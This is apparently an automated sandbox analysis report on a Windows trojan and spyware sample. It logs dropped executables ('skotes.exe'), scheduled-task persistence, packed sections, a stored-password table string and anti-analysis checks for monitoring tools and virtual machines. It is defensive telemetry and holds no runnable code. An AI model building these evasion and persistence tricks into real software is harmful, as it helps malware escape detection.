                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeCode function: String function: 00D680C0 appears 130 times
                        Source: Dl6wuWiQdg.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: Dl6wuWiQdg.exeStatic PE information: Section: ZLIB complexity 0.9999229029605263
                        Source: Dl6wuWiQdg.exeStatic PE information: Section: ffxetdru ZLIB complexity 0.994471253583283
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@1/3
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile created: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeFile read: C:\Users\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2157662713.00000000053E8000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2175549687.00000000053EB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2175647181.00000000053DE000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2158045580.00000000053CA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: Dl6wuWiQdg.exeVirustotal: Detection: 56%
                        Source: Dl6wuWiQdg.exeReversingLabs: Detection: 60%
                        Source: Dl6wuWiQdg.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                        Source: 8WYS1MQTL0QCOHKIPL8.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                        Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                        Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                        Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile read: C:\Users\user\Desktop\Dl6wuWiQdg.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\Dl6wuWiQdg.exe "C:\Users\user\Desktop\Dl6wuWiQdg.exe"
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeProcess created: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe "C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe"
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeProcess created: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe "C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: mstask.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: dui70.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: duser.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: chartv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: oleacc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: atlthunk.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: wtsapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: winsta.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: explorerframe.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                        Source: Dl6wuWiQdg.exeStatic file information: File size 1868288 > 1048576
                        Source: Dl6wuWiQdg.exeStatic PE information: Raw size of ffxetdru is bigger than: 0x100000 < 0x19e400

                        Data Obfuscation

                        barindex
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeUnpacked PE file: 0.2.Dl6wuWiQdg.exe.d90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ffxetdru:EW;yccyqbqs:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ffxetdru:EW;yccyqbqs:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeUnpacked PE file: 5.2.8WYS1MQTL0QCOHKIPL8.exe.d50000.0.unpack :EW;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 6.2.skotes.exe.780000.0.unpack :EW;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 7.2.skotes.exe.780000.0.unpack :EW;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 9.2.skotes.exe.780000.0.unpack :EW;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW;
                        Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                        Source: skotes.exe.5.drStatic PE information: real checksum: 0x31d37e should be: 0x3239b2
                        Source: 8WYS1MQTL0QCOHKIPL8.exe.0.drStatic PE information: real checksum: 0x31d37e should be: 0x3239b2
                        Source: Dl6wuWiQdg.exeStatic PE information: real checksum: 0x1d7315 should be: 0x1c9e34
                        Source: Dl6wuWiQdg.exeStatic PE information: section name:
                        Source: Dl6wuWiQdg.exeStatic PE information: section name: .idata
                        Source: Dl6wuWiQdg.exeStatic PE information: section name:
                        Source: Dl6wuWiQdg.exeStatic PE information: section name: ffxetdru
                        Source: Dl6wuWiQdg.exeStatic PE information: section name: yccyqbqs
                        Source: Dl6wuWiQdg.exeStatic PE information: section name: .taggant
                        Source: 8WYS1MQTL0QCOHKIPL8.exe.0.drStatic PE information: section name:
                        Source: 8WYS1MQTL0QCOHKIPL8.exe.0.drStatic PE information: section name: .idata
                        Source: 8WYS1MQTL0QCOHKIPL8.exe.0.drStatic PE information: section name: tezivoqu
                        Source: 8WYS1MQTL0QCOHKIPL8.exe.0.drStatic PE information: section name: tcaewlrx
                        Source: 8WYS1MQTL0QCOHKIPL8.exe.0.drStatic PE information: section name: .taggant
                        Source: skotes.exe.5.drStatic PE information: section name:
                        Source: skotes.exe.5.drStatic PE information: section name: .idata
                        Source: skotes.exe.5.drStatic PE information: section name: tezivoqu
                        Source: skotes.exe.5.drStatic PE information: section name: tcaewlrx
                        Source: skotes.exe.5.drStatic PE information: section name: .taggant
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeCode function: 5_2_00D6D91C push ecx; ret 5_2_00D6D92F
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeCode function: 5_2_00D61359 push es; ret 5_2_00D6135A
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_0079D91C push ecx; ret 6_2_0079D92F
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_0079D91C push ecx; ret 7_2_0079D92F
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_00989680 push 37530E9Ch; mov dword ptr [esp], ebp9_2_009896AC
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_0079D91C push ecx; ret 9_2_0079D92F
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_0079DFC6 push ecx; ret 9_2_0079DFD9
                        Source: Dl6wuWiQdg.exeStatic PE information: section name: entropy: 7.983145979605079
                        Source: Dl6wuWiQdg.exeStatic PE information: section name: ffxetdru entropy: 7.953108190155835
                        Source: 8WYS1MQTL0QCOHKIPL8.exe.0.drStatic PE information: section name: entropy: 7.138645527976382
                        Source: skotes.exe.5.drStatic PE information: section name: entropy: 7.138645527976382
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile created: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeJump to dropped file

                        Boot Survival

                        barindex
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeWindow searched: window name: RegmonclassJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeWindow searched: window name: FilemonclassJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeWindow searched: window name: RegmonclassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_6-9722
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_5-10749
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSystem information queried: FirmwareTableInformationJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
